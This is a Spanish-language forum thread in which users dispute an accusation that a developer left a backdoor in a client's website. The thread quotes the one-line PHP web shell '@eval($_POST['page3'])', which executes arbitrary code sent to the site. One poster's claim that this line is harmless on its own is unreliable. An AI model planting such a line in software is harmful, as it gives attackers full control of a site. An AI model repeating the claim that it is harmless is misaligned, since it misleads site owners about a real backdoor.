Antes que nada estamos en una aclaración y esta permitido cualquier comentario de los usuarios pero amigos / familiares siempre protegeran a alguien que conocen que un desconocido ... evitemos eso y dejemos que otros comenten.
Bueno antes que nada [MENTION=29029]SoLuIts[/MENTION]
para los que no lo sepan dicho codigo permite hacerse con el control de todo un sitio.
codigo:
Insertar CODE, HTML o PHP:
<?php @eval($_POST['page3']);?>
Si te refieres al codigo eval que esta citado en codigo pues estas equivocado no veo nada malo ahi.... asi que voy por la otra opcion:
$_POST['page3'] recibe esa opcion si se envia un form con la id 'page3' lo cual dudo que ese era el problema ....
porque razón habría una "redireccion" con un $_POST['page3'] si nisiquiera esta dando click a algun boton del form? o lo esta dando ???...
El codigo que mostraste en un txt no veo nada relacionado a esto. ( virus o similar no veo nada )
Yo no conosco al Sr. [MENTION=81006]kanikase[/MENTION] asi que no me consideres aliado ni tampoco enemigo pero yo doy mi opinion y aqui hay algo sumamente extraño.
Que algun programador aparte de mi se percate de esto por favor y me diga que estoy incorrecto.
[MENTION=28762]tnc05[/MENTION] tu no puedes dar una acusasion a alguien asi por asi, primero se habla y de buenas maneras , que me venga un usuario y me diga " malgoraste mi sitio, colaborame o te coloco negativa " ??? como que no va pero bueno ... lo acusaste solo porque el entro ese dia a la modificacion/creacion/remplazo/etc del script por FTP , si crees que el fue el culpable minimo dale mas informacion y detalles no diciendo te colocare negativa.
Tal ves te artaste que el usuario te haga dar vueltas en el asunto y es normal pero eso seria otra acusacion , no estamos por eso aqui.
El usuario que te arreglo tu sitio que es [MENTION=29029]SoLuIts[/MENTION] me puedes pasar el codigo eval completo por favor? porque ese $_POST['page3'] supongo que tu lo pusiste o modificaste porque no hay nada malo ahi, quisiera saber el codigo completo , haber si [MENTION=81006]kanikase[/MENTION] acepta dar ese codigo en publico o parte de ella de la cual "encripto" y si no lo encripto mucho mejor.
Asi veremos de quien fue la culpa , el verdadero culpable y quien miente o no.
- - - Actualizado - - -
[MENTION=29029]SoLuIts[/MENTION] Imagina que yo no se nada sobre programación, ¿me podrías explicar en que beneficiaria ese código al que infecta el sitio?
si no pone codigo completo no se sabria, ese eval de ahi no infecta ni se apodera de nada si no esta el codigo completo , alguien que muestre el codigo completo del eval sea codificado o no ? .
Que pruebas hay del virus?